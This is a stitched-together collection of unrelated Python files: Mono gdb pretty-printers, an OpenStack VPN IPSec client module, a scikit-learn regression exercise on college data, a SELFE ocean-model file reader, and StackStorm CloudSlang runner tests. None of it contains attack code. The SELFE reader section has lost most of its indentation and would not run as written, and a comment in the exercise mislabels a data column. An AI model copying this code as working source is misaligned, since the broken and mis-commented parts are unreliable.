            # Arrays have no named children to expand.
            if class_name [-2:len(class_name)] == "[]":
                return {}.__iter__ ()
            gdb_type = gdb.lookup_type ("struct %s_%s" % (class_ns.replace (".", "_"), class_name))
            return self._iterator(obj.cast (gdb_type))
        except:
            # Best-effort: debug info may be missing for the type.
            print sys.exc_info ()[0]
            print sys.exc_info ()[1]
            return {}.__iter__ ()
    def to_string(self):
        if int(self.val.cast (gdb.lookup_type ("guint64"))) == 0:
            return "null"
        try:
            obj = self.val.dereference ()
            class_ns = obj ['vtable'].dereference ()['klass'].dereference ()['name_space'].string ()
            class_name = obj ['vtable'].dereference ()['klass'].dereference ()['name'].string ()
            # Delegate strings and arrays to their dedicated printers.
            if class_ns == "System" and class_name == "String":
                return StringPrinter (self.val).to_string ()
            if class_name [-2:len(class_name)] == "[]":
                return ArrayPrinter (self.val,class_ns,class_name).to_string ()
            if class_ns != "":
                try:
                    gdb_type = gdb.lookup_type ("struct %s.%s" % (class_ns, class_name))
                except:
                    # Maybe there is no debug info for that type
                    return "%s.%s" % (class_ns, class_name)
                #return obj.cast (gdb_type)
                return "%s.%s" % (class_ns, class_name)
            return class_name
        except:
            print sys.exc_info ()[0]
            print sys.exc_info ()[1]
            # FIXME: This can happen because we don't have liveness information
            return self.val.cast (gdb.lookup_type ("guint64"))
class MonoMethodPrinter:
    "Print a MonoMethod structure"
    def __init__(self, val):
        self.val = val
    def to_string(self):
        # Null pointer guard.
        if int(self.val.cast (gdb.lookup_type ("guint64"))) == 0:
            return "0x0"
        val = self.val.dereference ()
        klass = val ["klass"].dereference ()
        class_name = stringify_class_name (klass ["name_space"].string (), klass ["name"].string ())
        # Rendered as "Namespace.Class:method ()".
        return "\"%s:%s ()\"" % (class_name, val ["name"].string ())
    # This returns more info but requires calling into the inferior
    #return "\"%s\"" % (gdb.parse_and_eval ("mono_method_full_name (%s, 1)" % (str (int (self.val.cast (gdb.lookup_type ("guint64")))))).string ())
class MonoClassPrinter:
    "Print a MonoClass structure"
    def __init__(self, val):
        self.val = val
    def to_string(self):
        # Null pointer guard.
        if int(self.val.cast (gdb.lookup_type ("guint64"))) == 0:
            return "0x0"
        klass = self.val.dereference ()
        class_name = stringify_class_name (klass ["name_space"].string (), klass ["name"].string ())
        return "\"%s\"" % (class_name)
    # This returns more info but requires calling into the inferior
    #return "\"%s\"" % (gdb.parse_and_eval ("mono_type_full_name (&((MonoClass*)%s)->byval_arg)" % (str (int ((self.val).cast (gdb.lookup_type ("guint64")))))))
def lookup_pretty_printer(val):
    "Return the pretty-printer matching val's type name, or None."
    type_name = str (val.type)
    # Exact type-name matches first.
    exact = {
        "object": ObjectPrinter,
        "string": StringPrinter,
        "MonoMethod *": MonoMethodPrinter,
        "MonoClass *": MonoClassPrinter,
    }
    printer = exact.get (type_name)
    if printer is not None:
        return printer (val)
    # Managed object references appear as "class Foo ... &".
    if type_name.startswith ("class") and type_name.endswith ("&"):
        return ObjectPrinter (val)
    return None
def register_csharp_printers(obj):
    "Register C# pretty-printers with objfile Obj (or globally if Obj is None)."
    # Use identity test `is None` rather than `== None`: gdb objects may
    # overload comparison operators, and identity is the correct None test.
    if obj is None:
        obj = gdb
    obj.pretty_printers.append (lookup_pretty_printer)
# This command will flush the debugging info collected by the runtime
class XdbCommand (gdb.Command):
    """gdb command `xdb`: flush the debugging info collected by the runtime."""
    def __init__ (self):
        super (XdbCommand, self).__init__ ("xdb", gdb.COMMAND_NONE,
                                            gdb.COMPLETE_COMMAND)
    def invoke(self, arg, from_tty):
        # Calls into the inferior to write out pending xdebug data.
        gdb.execute ("call mono_xdebug_flush ()")
# Install the printers into the current objfile (or globally) and register
# the `xdb` command with gdb.
register_csharp_printers (gdb.current_objfile())
XdbCommand ()
# Ask the mono runtime to emit debug info for gdb (cf. --debug=gdb).
gdb.execute ("set environment MONO_XDEBUG gdb")
print "Mono support loaded."
|
|
# Copyright 2014-2017 by Akira Yoshiyama <akirayoshiyama@gmail.com>.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Resource class and its manager for VPN IPSec site connections in
Networking V2 API
"""
from osclient2 import base
from osclient2 import mapper
from osclient2 import utils
# Each entry is (resource attribute name, API/JSON key, value mapper).
ATTRIBUTE_MAPPING = [
    ('id', 'id', mapper.Noop),
    ('name', 'name', mapper.Noop),
    ('description', 'description', mapper.Noop),
    ('peer_address', 'peer_address', mapper.Noop),
    ('peer_id', 'peer_id', mapper.Noop),
    ('local_ep_group_id', 'local_ep_group_id', mapper.Noop),
    ('peer_ep_group_id', 'peer_ep_group_id', mapper.Noop),
    ('peer_cidrs', 'peer_cidrs', mapper.Noop),
    ('route_mode', 'route_mode', mapper.Noop),
    ('mtu', 'mtu', mapper.Noop),
    ('auth_mode', 'auth_mode', mapper.Noop),
    ('psk', 'psk', mapper.Noop),
    ('initiator', 'initiator', mapper.Noop),
    ('ikepolicy', 'ikepolicy_id',
     mapper.Resource('neutron.vpn.ikepolicy')),
    ('ipsecpolicy', 'ipsecpolicy_id',
     mapper.Resource('neutron.vpn.ipsecpolicy')),
    ('vpnservice', 'vpnservice_id',
     mapper.Resource('neutron.vpn.vpnservice')),
    ('project', 'tenant_id', mapper.Resource('project')),
    ('dpd', 'dpd', mapper.Noop),
    ('action', 'action', mapper.Noop),
    ('interval', 'interval', mapper.Noop),
    ('timeout', 'timeout', mapper.Noop),
    ('is_enabled', 'admin_state_up', mapper.Noop),
    ('status', 'status', mapper.Noop),
]
class Resource(base.Resource):
    """Resource class for VPN IPSec site connections in Networking V2 API"""

    def update(self, name=None, description=None,
               peer_address=None, peer_id=None,
               local_ep_group_id=None, peer_ep_group_id=None,
               peer_cidrs=None, mtu=None, psk=None, initiator=None,
               dpd=None, action=None, interval=None, timeout=None,
               is_enabled=True):
        """
        Update properties of an IPSec site connection

        @keyword name: IPSec site connection name
        @type name: str
        @keyword description: Description
        @type description: str
        @keyword peer_address: Peer address
        @type peer_address: str
        @keyword peer_id: Peer ID
        @type peer_id: str
        @keyword local_ep_group_id: Local EP group ID
        @type local_ep_group_id: str
        @keyword peer_ep_group_id: Peer EP group ID
        @type peer_ep_group_id: str
        @keyword peer_cidrs: Peer CIDRs
        @type peer_cidrs: str
        @keyword mtu: MTU
        @type mtu: int
        @keyword psk: PSK
        @type psk: str
        @keyword initiator: Initiator
        @type initiator: str
        @keyword dpd: DPD
        @type dpd: str
        @keyword action: Action
        @type action: str
        @keyword interval: Interval
        @type interval: str
        @keyword timeout: Timeout
        @type timeout: int
        @keyword is_enabled: Whether the connection is enabled
        @type is_enabled: bool
        @rtype: None
        """
        # BUG FIX: this method previously delegated to super().create(),
        # which would attempt to create a new connection rather than update
        # the existing one. Delegate to the base class update() instead.
        return super(Resource, self).update(
            name=name,
            description=description,
            peer_address=peer_address,
            peer_id=peer_id,
            local_ep_group_id=local_ep_group_id,
            peer_ep_group_id=peer_ep_group_id,
            peer_cidrs=peer_cidrs,
            mtu=mtu,
            psk=psk,
            initiator=initiator,
            dpd=dpd,
            action=action,
            interval=interval,
            timeout=timeout,
            is_enabled=is_enabled
        )
class Manager(base.Manager):
    """Manager class for VPN IPSec site connections in Networking V2 API"""

    resource_class = Resource
    service_type = 'network'
    _attr_mapping = ATTRIBUTE_MAPPING
    _json_resource_key = 'ipsec_site_connection'
    _json_resources_key = 'ipsec_site_connections'
    _url_resource_path = '/v2.0/vpn/ipsec-site-connections'

    def create(self, name=None, description=None, peer_address=None,
               peer_id=None, local_ep_group_id=None,
               peer_ep_group_id=None, peer_cidrs=None,
               route_mode=None, mtu=None, auth_mode=None, psk=None,
               initiator=None, ikepolicy=None, ipsecpolicy=None,
               vpnservice=None, project=None, dpd=None, action=None,
               interval=None, timeout=None, is_enabled=True):
        """
        Create an IPSec site connection

        @keyword name: IPSec site connection name (str)
        @keyword description: Description (str)
        @keyword peer_address: Peer address (str)
        @keyword peer_id: Peer ID (str)
        @keyword local_ep_group_id: Local EP group ID (str)
        @keyword peer_ep_group_id: Peer EP group ID (str)
        @keyword peer_cidrs: Peer CIDRs (str)
        @keyword route_mode: Route mode (str)
        @keyword mtu: MTU (int)
        @keyword auth_mode: Auth mode (str)
        @keyword psk: PSK (str)
        @keyword initiator: Initiator (str)
        @keyword ikepolicy: IKE policy (str)
        @keyword ipsecpolicy: IPSec policy (str)
        @keyword vpnservice: VPN service (str)
        @keyword project: Project (osclient2.project.Resource)
        @keyword dpd: DPD (str)
        @keyword action: Action (str)
        @keyword interval: Interval (str)
        @keyword timeout: Timeout (int)
        @keyword is_enabled: Whether the connection is enabled (bool)
        @return: Created connection
        @rtype: osclient2.neutron.v2.vpn.ipsec_site_connection.Resource
        """
        # Collect all attributes, then delegate to the base implementation.
        attrs = dict(
            name=name,
            description=description,
            peer_address=peer_address,
            peer_id=peer_id,
            local_ep_group_id=local_ep_group_id,
            peer_ep_group_id=peer_ep_group_id,
            peer_cidrs=peer_cidrs,
            route_mode=route_mode,
            mtu=mtu,
            auth_mode=auth_mode,
            psk=psk,
            initiator=initiator,
            ikepolicy=ikepolicy,
            ipsecpolicy=ipsecpolicy,
            vpnservice=vpnservice,
            project=project,
            dpd=dpd,
            action=action,
            interval=interval,
            timeout=timeout,
            is_enabled=is_enabled,
        )
        return super(Manager, self).create(**attrs)
|
|
import pandas as pd
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
matplotlib.style.use('ggplot') # Look Pretty
def drawLine(model, X_test, y_test, title, R2):
    "Scatter the test observations, overlay the fitted regression line, and show R2."
    # NOTE: Python 2 script (print statements below).
    # This convenience method will take care of plotting your
    # test observations, comparing them to the regression line,
    # and displaying the R2 coefficient
    fig = plt.figure()
    ax = fig.add_subplot(111)
    ax.scatter(X_test, y_test, c='g', marker='o')
    ax.plot(X_test, model.predict(X_test), color='orange', linewidth=1, alpha=0.7)
    title += " R2: " + str(R2)
    ax.set_title(title)
    print title
    print "Intercept(s): ", model.intercept_
    plt.show()
def drawPlane(model, X_test, y_test, title, R2):
    "Scatter the test observations in 3D, overlay the regression plane, and show R2."
    # This convenience method will take care of plotting your
    # test observations, comparing them to the regression plane,
    # and displaying the R2 coefficient
    fig = plt.figure()
    ax = Axes3D(fig)
    ax.set_zlabel('prediction')
    # You might have passed in a DataFrame, a Series (slice),
    # an NDArray, or a Python List... so let's keep it simple:
    X_test = np.array(X_test)
    col1 = X_test[:,0]
    col2 = X_test[:,1]
    # Set up a Grid. We could have predicted on the actual
    # col1, col2 values directly; but that would have generated
    # a mesh with WAY too fine a grid, which would have detracted
    # from the visualization
    x_min, x_max = col1.min(), col1.max()
    y_min, y_max = col2.min(), col2.max()
    x = np.arange(x_min, x_max, (x_max-x_min) / 10)
    y = np.arange(y_min, y_max, (y_max-y_min) / 10)
    x, y = np.meshgrid(x, y)
    # Predict based on possible input values that span the domain
    # of the x and y inputs:
    z = model.predict( np.c_[x.ravel(), y.ravel()] )
    z = z.reshape(x.shape)
    ax.scatter(col1, col2, y_test, c='g', marker='o')
    ax.plot_wireframe(x, y, z, color='orange', alpha=0.7)
    title += " R2: " + str(R2)
    ax.set_title(title)
    print title
    print "Intercept(s): ", model.intercept_
    plt.show()
#
# INFO: Let's get started!
#
# TODO: First, as is your habit, inspect your dataset in a text
# editor, or spread sheet application. The first thing you should
# notice is that the first column is both unique (the name of each)
# college, as well as unlabeled. This is a HINT that it must be the
# index column. If you do not indicate to Pandas that you already
# have an index column, it'll create one for you, which would be
# undesirable since you already have one.
#
# Review the .read_csv() documentation and discern how to load up
# a dataframe while indicating which existing column is to be taken
# as an index. Then, load up the College dataset into a variable
# called X:
#
# Load the dataset; the unlabeled first column (college name) is the index.
X = pd.read_csv('Datasets/College.csv', index_col=0)
#
# INFO: This line isn't necessary for your purposes; but we'd just
# like to show you an additional way to encode features directly.
# The .map() method is like .apply(), but instead of taking in a
# lambda / function, you simply provide a mapping of keys:values.
# If you decide to embark on the "Data Scientist Challenge", this
# line of code will save you the trouble of converting it through
# other means:
# Encode the Private flag numerically with a key->value mapping.
X.Private = X.Private.map({'Yes':1, 'No':0})
#
# TODO: Create your linear regression model here and store it in a
# variable called 'model'. Don't actually train or do anything else
# with it yet:
#
from sklearn import linear_model
# One shared estimator instance, re-fit for each feature set below.
model = linear_model.LinearRegression()
#
# INFO: The first relationship we're interested in is the
# number of accepted students, as a function of the amount
# charged for room and board.
#
# TODO: Using indexing, create two slices (series). One will just
# store the room and board column, the other will store the accepted
# students column. Then use train_test_split to cut your data up
# into X_train, X_test, y_train, y_test, with a test_size of 30% and
# a random_state of 7.
#
from sklearn.model_selection import train_test_split
# Accept as a function of Room.Board; 70/30 split with a fixed seed.
X_train, X_test, y_train, y_test = train_test_split(X[['Room.Board']], X['Accept'], test_size=0.3, random_state=7)
#
# TODO: Fit and score your model appropriately. Store the score in the
# score variable.
#
model.fit(X_train, y_train)
# R^2 on the held-out 30%.
score = model.score(X_test, y_test)
# INFO: We'll take it from here, buddy:
drawLine(model, X_test, y_test, "Accept(Room&Board)", score)
#
# TODO: Duplicate the process above; this time, model the number of
# accepted students, as a function of the number of enrolled students
# per college.
#
# Same pipeline, with Enroll as the single predictor.
X_train, X_test, y_train, y_test = train_test_split(X[['Enroll']], X['Accept'], test_size=0.3, random_state=7)
model.fit(X_train, y_train)
score = model.score(X_test, y_test)
drawLine(model, X_test, y_test, "Accept(Enroll)", score)
#
# TODO: Duplicate the process above; this time, model the number of
# accepted students, as a function of the number of failed undergraduate
# students per college.
#
# Same pipeline, with F.Undergrad as the single predictor.
X_train, X_test, y_train, y_test = train_test_split(X[['F.Undergrad']], X['Accept'], test_size=0.3, random_state=7)
model.fit(X_train, y_train)
score = model.score(X_test, y_test)
drawLine(model, X_test, y_test, "Accept(F.Undergrad)", score)
#
# TODO: Duplicate the process above (almost). This time is going to be
# a bit more complicated. Instead of modeling one feature as a function
# of another, you will attempt to do multivariate linear regression to
# model one feature as a function of TWO other features.
#
# Model the amount charged for room and board AND the number of enrolled
# students, as a function of the number of accepted students. To do
# this, instead of creating a regular slice for a single-feature input,
# simply create a slice that contains both columns you wish to use as
# inputs. Your training labels will remain a single slice.
#
# Multivariate regression: two predictors, one target; plotted as a plane.
X_train, X_test, y_train, y_test = train_test_split(X[['Room.Board','Enroll']], X['Accept'], test_size=0.3, random_state=7)
model.fit(X_train, y_train)
score = model.score(X_test, y_test)
drawPlane(model, X_test, y_test, "Accept(Room&Board,Enroll)", score)
#
# INFO: That concludes this assignment
#
# INFO + HINT On Fitting, Scoring, and Predicting:
#
# Here's a hint to help you complete the assignment without pulling
# your hair out! When you use .fit(), .score(), and .predict() on
# your model, SciKit-Learn expects your training data to be in
# spreadsheet (2D Array-Like) form. This means you can't simply
# pass in a 1D Array (slice) and get away with it.
#
# To properly prep your data, you have to pass in a 2D Numpy Array,
# or a dataframe. But what happens if you really only want to pass
# in a single feature?
#
# If you slice your dataframe using df[['ColumnName']] syntax, the
# result that comes back is actually a *dataframe*. Go ahead and do
# a type() on it to check it out. Since it's already a dataframe,
# you're good -- no further changes needed.
#
# But if you slice your dataframe using the df.ColumnName syntax,
# OR if you call df['ColumnName'], the result that comes back is
# actually a series (1D Array)! This will cause SKLearn to bug out.
# So if you are slicing using either of those two techniques, before
# sending your training or testing data to .fit / .score, do a
# my_column = my_column.reshape(-1,1). This will convert your 1D
# array of [n_samples], to a 2D array shaped like [n_samples, 1].
# A single feature, with many samples.
#
# If you did something like my_column = [my_column], that would produce
# an array in the shape of [1, n_samples], which is incorrect because
# SKLearn expects your data to be arranged as [n_samples, n_features].
# Keep in mind, all of the above only relates to your "X" or input
# data, and does not apply to your "y" or labels.
#
# Data Scientist Challenge
# ========================
#
# You've experimented with a number of feature scaling techniques
# already, such as MaxAbsScaler, MinMaxScaler, Normalizer, StandardScaler
# and more from http://scikit-learn.org/stable/modules/classes.html#module-sklearn.preprocessing
#
# What happens if you apply scaling to your data before doing
# linear regression? Would it alter the quality of your results?
# Do the scalers that work on a per-feature basis, such as MinMaxScaler
# behave differently than those that work on a multi-feature basis, such
# as normalize? And moreover, once your features have been scaled, you
# won't be able to use the resulting regression directly... unless you're
# able to .inverse_transform() the scaling. Do all of the SciKit-Learn
# scalers support that?
#
# This is your time to shine and to show how much of an explorer you are:
# Dive deeper into uncharted lands, browse SciKit-Learn's documentation,
# scour Google, ask questions on Quora, Stack-Overflow, and the course
# message board, and see if you can discover something that will be of
# benefit to you in the future!
|
|
#========================================================================
# File: pyselfe.py
#========================================================================
"""@package docstring
pyselfe : SELFE Model Dataset IO Functions
This module enables the reading of model results generated by SELFE
Works with data format ver.5 SELFE binary files and implements
the extraction of subsets of data from a series of files.
NOTE : Only tested for pure S coordinates. Hybrid S-Z not tested.
Output to other formats not yet implemented.
USAGE EXAMPLE:
sys.path.append('/home/dharhas/scripts/selfe') #path to location of pyselfe.py
import pyselfe
model = pyselfe.Dataset('./data/1_elev.61') #path to first file of series
[t,t_iter,eta,dp,mdata] = model.read_time_series(param,xy=xy,nfiles=nf,datadir=datadir)
#where param = elev.61,hvel.64 etc. read_time_series is documented in detail below.
"""
from __future__ import (absolute_import, division, print_function)
#
#
__author__ = 'Dharhas Pothina'
__revision__ = "$Revision: 0.1.3 $"
__doc__ = "SELFE Unstructured Grid Ocean Model IO Functions"
#========================================================================
# imports
#========================================================================
import numpy as N
from scipy.spatial import cKDTree as KDTree
import numpyIO as io
import sys
import os
class Dataset:
"""
SELFE Model Binary IO Functions
Presently enables reading SELFE dataformat version 5.0 binary output files.
Can read 2D & 3D scalar and vector variables.
Usage Example:
model = pyselfe.Dataset('1_hvel.64')
[t,t_iter,eta,dp,data] = model.read_time_series()
t = time in seconds
t_iter = iteration number
eta = water surface elevation
dp = bathymetric depth
data = 2D/3D variables
@author Dharhas Pothina
@version 0.2
"""
    def __init__(self,fname, nfiles=1):
        "Initialise by reading header information from file"
        # fname: path to the first binary output file of the series.
        self.fname = fname
        fid = open(fname,'rb')
        self.read_header(fid)
        self.read_hgrid(fid)
        # File offset where the per-timestep data blocks begin.
        self.data_start_pos=fid.tell()
        self.compute_step_size()
        self.datadir = os.path.split(fname)[0]
        self.nfiles = nfiles
        # NOTE(review): fid is never explicitly closed here -- confirm this is intended.
    def read_header(self,fid):
        "Read header information from SELFE binary output file"
        #read misc header info (fixed-width 48-byte text fields)
        self.data_format = fid.read(48)
        self.version = fid.read(48)
        self.start_time = fid.read(48)
        self.var_type = fid.read(48)
        self.var_dimension = fid.read(48)
        self.nsteps = io.fread(fid,1,'i')
        self.dt = io.fread(fid,1,'f')
        self.skip = io.fread(fid,1,'i')
        # flag_sv: used as a per-node component multiplier in compute_step_size
        # (presumably scalar vs vector -- confirm against format spec).
        self.flag_sv = io.fread(fid,1,'i')
        # flag_dm: 2 for 2D or 3 for 3D data (see compute_step_size).
        self.flag_dm = io.fread(fid,1,'i')
        #@todo check when zDes needs to be read
        #self.zDes = io.fread(fid,1,'f')
        #read vert grid info
        self.nlevels = io.fread(fid,1,'i')
        self.kz = io.fread(fid,1,'i')
        self.h0 = io.fread(fid,1,'f')
        self.hs = io.fread(fid,1,'f')
        self.hc = io.fread(fid,1,'f')
        self.theta_b = io.fread(fid,1,'f')
        self.theta = io.fread(fid,1,'f')
        # kz Z-levels followed by (nlevels - kz) S-levels.
        self.zlevels = io.fread(fid,self.kz,'f')
        self.slevels = io.fread(fid,self.nlevels-self.kz,'f')
def read_hgrid(self,fid):
"Read horizontal grid info from SELFE binary output filefile"
#read dimensions
self.np = io.fread(fid,1,'i')
self.ne = io.fread(fid,1,'i')
#read grid and bathymetry
pos=fid.tell()
hgridtmp = io.fread(fid,4*self.np,'f')
self.x, self.y, self.dp, tmp1 = hgridtmp.reshape(self.np,4).transpose()
#read bottom index
fid.seek(pos)
hgridtmp = io.fread(fid,4*self.np,'i')
tmp1, tmp2, tmp3, self.bot_idx = hgridtmp.reshape(self.np,4).transpose()
#read element connectivity list
self.elem = io.fread(fid,4*self.ne,'i')
self.elem = self.elem.reshape(self.ne,4)[:,1:4]
#create kdtree
self.kdtree = KDTree(zip(self.x,self.y))
def compute_step_size(self):
"Compute the data block size to move one timestep within the file"
#calculate grid size depending on whether dataset is 3D or 2D
if self.flag_dm == 3:
#@todo check what needs to be done with bIdx (==0?)for dry nodes
bIdx = self.bot_idx
bIdx[bIdx<1] = 1
self.grid_size = sum(self.nlevels - bIdx+1)
elif self.flag_dm == 2:
self.grid_size = self.np
#compute step size
self.step_size = 2*4 + self.np*4 + self.grid_size*4*self.flag_sv;
def read_time_series(self,fname,nodes=None,levels=None,xy=N.array([]),nfiles=3,sfile=1,datadir=None):
"""
Main function to extract a spatial and temporal slice of entire 3D Time series.
Returns [t,t_iter,eta,dp,data] where
t : time in seconds from simulation start
t_iter : iteration number from simulation start
eta : Surface water elevation time series
dp : Bathymetry (depth of sea bed from MSL)
data[t,nodes,levels,vars] : extracted data slice (ie Salinity, Temp, Velocity etc)
Options:
nodes : list of nodes to extract (default is all nodes)
level : list of levels to extract (default is all levels)
xy : array of x,y coordinates to extract (default is none)
sfile : serial number of starting file (default is one)
nfiles : number of files in data sequence (default is one)
NOTE : node index starts at zero so add one to match up with node numbers in
SELFE hgrid.gr3 file
"""
#initialize vars
t = N.array([])
t_iter = N.array([])
eta = []
data = []
if nfiles is None:
nfiles = self.nfiles
if datadir is None:
datadir = self.datadir
#convert xy points to list of nodes,
#find parent elements & calculate interpolation weights
if xy.size!=0:
if xy.shape[1]!=2:
sys.exit('xy array shape wrong')
nodes=N.array([],dtype='int32')
arco=N.array([])
for xy00 in xy:
parent, tmparco, node3 = self.find_parent_element(xy00[0],xy00[1])
nodes = N.append(nodes,node3-1)
arco = N.append(arco,tmparco)
#set default for nodes to be all nodes
#node index starts at zero
elif nodes is None:
nodes = N.arange(self.np)
#set default for level to be all levels
if levels is None:
levels = N.arange(self.nlevels)
#check whether 2D or 3D variable is being read
if self.flag_dm==2:
nlevs = 1
levels = N.array([0])
else:
nlevs = self.nlevels
#read time series slice
for files in N.arange(sfile, sfile + nfiles):
try:
fname1 = datadir + '/' + str(files) + '_' + fname
fid = open(fname1,'rb')
fid.seek(self.data_start_pos)
for i in N.arange(self.nsteps):
t = N.append(t, io.fread(fid, 1, 'f'))
t_iter = N.append(t_iter, io.fread(fid, 1, 'i'))
eta.append(io.fread(fid, self.np, 'f'))
tmpdata = io.fread(fid, self.flag_sv*self.grid_size, 'f')
tmpdata = tmpdata.reshape(self.np, nlevs, self.flag_sv)
#only keep requested slice of tmpdata
#i.e. tmpdata[nodes,levels,var]
tmpdata = tmpdata[nodes,:,:]
tmpdata = tmpdata[:,levels,:]
data.append(tmpdata)
except:
continue
# import pdb; pdb.set_trace()
eta = N.column_stack(eta[:]).T
eta = eta[:,nodes]
data = N.array(data)
dp = self.dp[nodes]
#convert nodal values back to xy point values if needed
if xy.size!=0:
#try:#not sure about this. need to look at it ion more detail put in to remove shape error
tmpdata = N.zeros((data.shape[0],data.shape[1]//3,data.shape[2],data.shape[3]))/0.
#except:
# tmpdata = N.zeros((data.shape[0],data.shape[1]//3,data.shape[2]))/0.
tmpeta = N.zeros((eta.shape[0],eta.shape[1]//3))/0.
tmpdp = N.zeros(dp.shape[0]//3)/0.
for i in range(xy.shape[0]):
n1 = i*3
n2 = n1+1
n3 = n2+1
tmpdata[:,i,:,:] = data[:,n1,:,:]*arco[n1] + data[:,n2,:,:]*arco[n2] + data[:,n3,:,:]*arco[n3]
tmpeta[:,i] = eta[:,n1]*arco[n1] + eta[:,n2]*arco[n2] + eta[:,n3]*arco[n3]
tmpdp[i] = dp[n1]*arco[n1] + dp[n2]*arco[n2] + dp[n3]*arco[n3]
data = tmpdata
eta = tmpeta
dp = tmpdp
return [t,t_iter,eta,dp,data]
def find_parent_element(self,x00,y00):
"""
Find Parent Element of a given (x,y) point and calculate interpolation wieghts
Uses brute force search through all elements. Calculates whether point is internal/external
to element by comparing summed area of sub triangles with area of triangle element.
@todo implement binary tree search for efficiency
Returns [parent,arco,node3] : parent element number, interp wieghts & element node numbers
"""
def signa(x1, x2, x3, y1, y2, y3):
"Return signed area of triangle"
return(((x1-x3)*(y2-y3)-(x2-x3)*(y1-y3))/2)
parent = -1
nm = self.elem.view()
out = N.zeros(3)/0.
x = self.x.view()
y = self.y.view()
for i in N.arange(self.ne):
aa = 0
ar = 0 #area
for j in N.arange(3):
j1 = j+1
j2 = j+2
if (j1>2):
j1 = j1-3
if (j2>2):
j2 = j2-3
n0 = nm[i,j]-1 #zero based index rather than 1 based index
n1 = nm[i,j1]-1
n2 = nm[i,j2]-1
out[j] = signa(x[n1], x[n2], x00, y[n1], y[n2], y00) #temporary storage
aa = aa+abs(out[j])
if (j==0):
ar = signa(x[n1], x[n2], x[n0], y[n1], y[n2], y[n0])
if (ar<=0):
sys.exit('Negative area:' + str(ar))
ae = abs(aa-ar)/ar
if (ae<=1.e-5):
parent = i
node3 = nm[i,0:3]
arco = out[0:3]/ar
arco[1] = max(0., min(1., arco[1]))
arco[2] = max(0., min(1., arco[2]))
if (arco[0]+arco[1]>1):
arco[2] = 0
arco[1] = 1-arco[0]
else:
arco[2] = 1-arco[0]-arco[1]
break
if (parent==-1):
sys.exit('Cannot find a parent:' + str(x00) +',' +str(y00))
else:
print('Parent Element :',parent+1,' ,Nodes: ',node3)
return [parent, arco, node3]
def compute_relative_rec(self, node, level):
"Computes offset for extracting particluar node/level: NOTE THIS FUNCTION NOT COMPLETE/TESTED"
count = 0
step = N.zeros(self.np, self.nlevels, self.flag_sv)/0.
for i in range(self.np):
for k in range(max(1, self.bot_idx[i]), self.nlevels):
for m in range(self.flag_sv):
count = count+1
step_size[i,k,m] = count
def read_time_series_xy(self, variable, x, y, sigma_level='middle', return_eta=False):
"""
finds nearest 3 nodes to x,y and returns the average value
"""
xy = N.hstack((x,y))
dist, nodes = self.kdtree.query(xy, k=3)
data = []
if sigma_level=='average':
t, t_iter, eta, dp, data = self.read_time_series(variable, nodes=nodes)
eta = eta.mean(axis=1)
data = data[:,:,:,0].mean(axis=2).mean(axis=1)
data = data.mean(axis=1).mean(axis=1) #take average of all levels and then 3 nodes for now. implement idw or area wieghted average later
if return_eta:
return [N.column_stack((t,data)), N.column_stack((t,eta))]
else:
return N.column_stack((t,data))
elif sigma_level=='top':
sigma_level = 0
elif sigma_level=='bottom':
sigma_level = self.nlevels - 1
elif sigma_level=='middle':
sigma_level = self.nlevels//2
t, t_iter, eta, dp, data = self.read_time_series(variable, nodes=nodes, levels=sigma_level)
eta = eta.mean(axis=1)
data = data[:,:,0,:].mean(axis=1)
#data.mean(axis=1).shape[:,0,:]
#data = data.mean(axis=1) #take average of all levels and then 3 nodes for now. implement idw or area wieghted average later
# import pdb; pdb.set_trace()
if return_eta:
return [N.column_stack((t,data)), N.column_stack((t,eta))]
else:
return N.column_stack((t,data))
|
|
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import mock
from unittest2 import TestCase
import st2actions.runners.cloudslang.cloudslang_runner as csr
from st2common.constants.action import LIVEACTION_STATUS_SUCCEEDED
from st2common.constants.action import LIVEACTION_STATUS_FAILED
import st2tests.config as tests_config
tests_config.parse_args()
class CloudSlangRunnerTestCase(TestCase):
    """Unit tests for the CloudSlang action runner.

    The external CloudSlang process is mocked throughout (run_command), so
    these tests only exercise the runner's parameter handling, command
    construction and exit-code -> liveaction-status mapping.
    """

    def test_runner_creation(self):
        """get_runner() returns a runner instance that carries a runner_id."""
        runner = csr.get_runner()
        self.assertTrue(runner)
        self.assertTrue(runner.runner_id)

    def test_pre_run_sets_attributes(self):
        """pre_run() copies inputs and timeout from runner_parameters onto the runner."""
        entry_point = 'path'
        inputs = {'a': 1}
        timeout = 10
        runner = csr.get_runner()
        runner.entry_point = entry_point
        runner.runner_parameters = {
            csr.RUNNER_INPUTS: inputs,
            csr.RUNNER_TIMEOUT: timeout,
        }
        runner.pre_run()
        self.assertEqual(runner.entry_point, entry_point)
        self.assertEqual(runner._inputs, inputs)
        self.assertEqual(runner._timeout, timeout)

    @mock.patch('st2actions.runners.cloudslang.cloudslang_runner.quote_unix')
    @mock.patch('st2actions.runners.cloudslang.cloudslang_runner.run_command')
    def test_run_calls_a_new_process_success(self, mock_run_command, mock_quote_unix):
        """Subprocess exit code 0 maps to LIVEACTION_STATUS_SUCCEEDED."""
        entry_point = 'path'
        timeout = 1
        runner = csr.get_runner()
        runner.entry_point = entry_point
        runner.runner_parameters = {
            csr.RUNNER_INPUTS: None,
            csr.RUNNER_TIMEOUT: timeout,
        }
        runner.pre_run()
        # run_command returns (exit_code, stdout, stderr, timed_out).
        mock_run_command.return_value = (0, "", "", False)
        mock_quote_unix.return_value = ""
        result = runner.run({})
        mock_quote_unix.assert_called_with(tests_config.CONF.cloudslang.home_dir)
        self.assertTrue(mock_run_command.called)
        self.assertEqual(LIVEACTION_STATUS_SUCCEEDED, result[0])

